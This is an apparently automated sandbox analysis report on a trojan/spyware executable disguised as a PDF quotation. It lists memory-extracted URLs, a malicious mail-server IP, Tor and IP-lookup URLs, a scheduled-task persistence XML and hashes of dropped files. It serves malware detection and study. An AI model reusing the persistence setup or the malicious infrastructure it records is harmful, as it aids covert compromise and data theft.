                            http://www.carterandcone.como.HBUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comQUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fonts.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.sandoll.co.krUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.deDPleaseUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersC8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.carterandcone.como.UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253046638.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sakkal.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnue4BUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.ipify.org%UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		low
                                  http://www.fontbureau.com/designerssUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257985084.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.carterandcone.comaUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers)8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260274303.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.comcomdUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://oVr11J0CkkX1DVO37.netUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514197510.000000000313C000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514154750.0000000003129000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cn8OXUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comvUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://mail.bonsa.ltUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://en.wUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253180685.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comlUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cnUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258973602.00000000055C4000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258918421.00000000055C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://lAnHfH.comUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers48UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.267126818.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257743913.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257514571.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257563714.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.comcomFUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers#UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.259916089.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/jBuUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251689579.0000000005585000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.sandoll.co.krimUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.tiro.comNormUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fontbureau.comalsUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.comalicUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.goodfont.co.krfk6UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.typography.netivUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257348457.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn#UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251459375.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comn-uFiUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      193.46.84.142
                                                      		mail.bonsa.ltLithuania
                                                      		43463BST-LTtrue

                                                      General Information

                                                      Joe Sandbox Version:35.0.0 Citrine
                                                      Analysis ID:652379
                                                      Start date and time: 26/06/202209:21:072022-06-26 09:21:07 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 9m 59s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:UN-Quotation 70000000187366444_PDF.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:35
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@12/11@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 0.3% (good quality ratio 0.2%)
                                                      • Quality average: 52.2%
                                                      • Quality standard deviation: 35%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 40
                                                      • Number of non-executed functions: 3
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 80.67.82.235, 80.67.82.211
                                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      09:22:20API Interceptor659x Sleep call for process: UN-Quotation 70000000187366444_PDF.exe modified
                                                      09:22:27API Interceptor79x Sleep call for process: powershell.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      BST-LTh8MhZOuYnXGet hashmaliciousBrowse
                                                      • 82.135.157.57

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UN-Quotation 70000000187366444_PDF.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):22276
                                                      Entropy (8bit):5.600682201698306
                                                      Encrypted:false
                                                      SSDEEP:384:WtCDdq0j8fPbI09jjS0ngjultI+H7Y9gtSJ3xeT1MaXZlbAV7fWijiZBDI+iOY:2bIY/TgClthTtc8C+fwh2VM
                                                      MD5:E86FEA48F78C3AB4F664EDF0608FF92F
                                                      SHA1:D8F7C143950E9E374E82A874363975FEAA1429D1
                                                      SHA-256:70547AFAF743047D836C2EDFF9C72715CFB14421B4DFD1228EB69ADB5A0A3FFF
                                                      SHA-512:1B484CB88FC90CE043B6101284707F00BEA93FD096858E5E45E54D86CEFB75182AE4E5A3855AF5BB579F5EF1308984503E410E1107B06216888F7BEB37841D70
                                                      Malicious:false
                                                      Preview:@...e...........y.......h...I.@.=.....7...I..........@..........H...............<@.^.L."My...:X..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ixxf1ao.tdn.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sd30g3rd.ubr.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1pzxb2l.vjd.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkqujwp3.55e.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\tmp25F3.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1593
                                                      Entropy (8bit):5.143309298274127
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtwVxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTwrv
                                                      MD5:2AE384B6BD08DEB19652391B22018E51
                                                      SHA1:F875E428D15D7DEE9B22417379846830BE18CFEE
                                                      SHA-256:841042492DDC076CBAC48A79F1CD463FC9870BB4F24941E12A1203CB16A8E57F
                                                      SHA-512:33D3D623978F18D65A96C4DD940513289DC8056FAD4D7AD2D8CE5BD6D254406D6B6DA155A61AD36C32100906135B1E33F72DDA318B3174A1E2AE971493EC1183
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                      C:\Users\user\AppData\Roaming\XrgnLg.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):625152
                                                      Entropy (8bit):7.805349083482096
                                                      Encrypted:false
                                                      SSDEEP:12288:ovHH2iNDkPRxliW1QqaqYfTY0U0k6QDdWl0KZDHQGET1t1XGOgSCMVNQ:k1pkPRrhwfTY9jBW9AZXWvSCMVNQ
                                                      MD5:0BFB0AB1E8C7EC929E44D70C196B4D21
                                                      SHA1:89C971AE9A832CDFE2E56E8ADFE9972505059C2C
                                                      SHA-256:CAE7DB67AE977F3F41349954ECEDD51D0248924012FBCB33610E44CED5F24611
                                                      SHA-512:F72F7217E75EA998167CBB70DF95926856B7C0DC2BDACB044D5E8DF16381CA05E740D71CDA374567B7AB6DCC9F4427D5B1BF5B96E1C6F737CE44708C3DDABE6C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 20%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b..............0..F...B.......e... ........@.. ....................................@..................................e..K.......t?........................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc...t?.......@...H..............@..@.reloc..............................@..B.................e......H.......|....=......^...<...M............................................0..........+.(..aS(....8.....#..V.-..?}....8.....#..(\..?}....8.....#....@..@}....8.....#X9..v..?}....8.....#.p=...P@}....8.....(.... .....:....&8....8v.......E........8......*...0..........+.(..$_8........E....S...%...8N......Z.. ....(....:....& ....8......#......D@Z.#.......?Z.#......D@YZX..8@.....*8.... ....(....9....&8......9....8......#......D@.......8....8....8......0..$.......+.(.].V...{....Z..8.

                                                      C:\Users\user\AppData\Roaming\XrgnLg.exe:Zone.Identifier

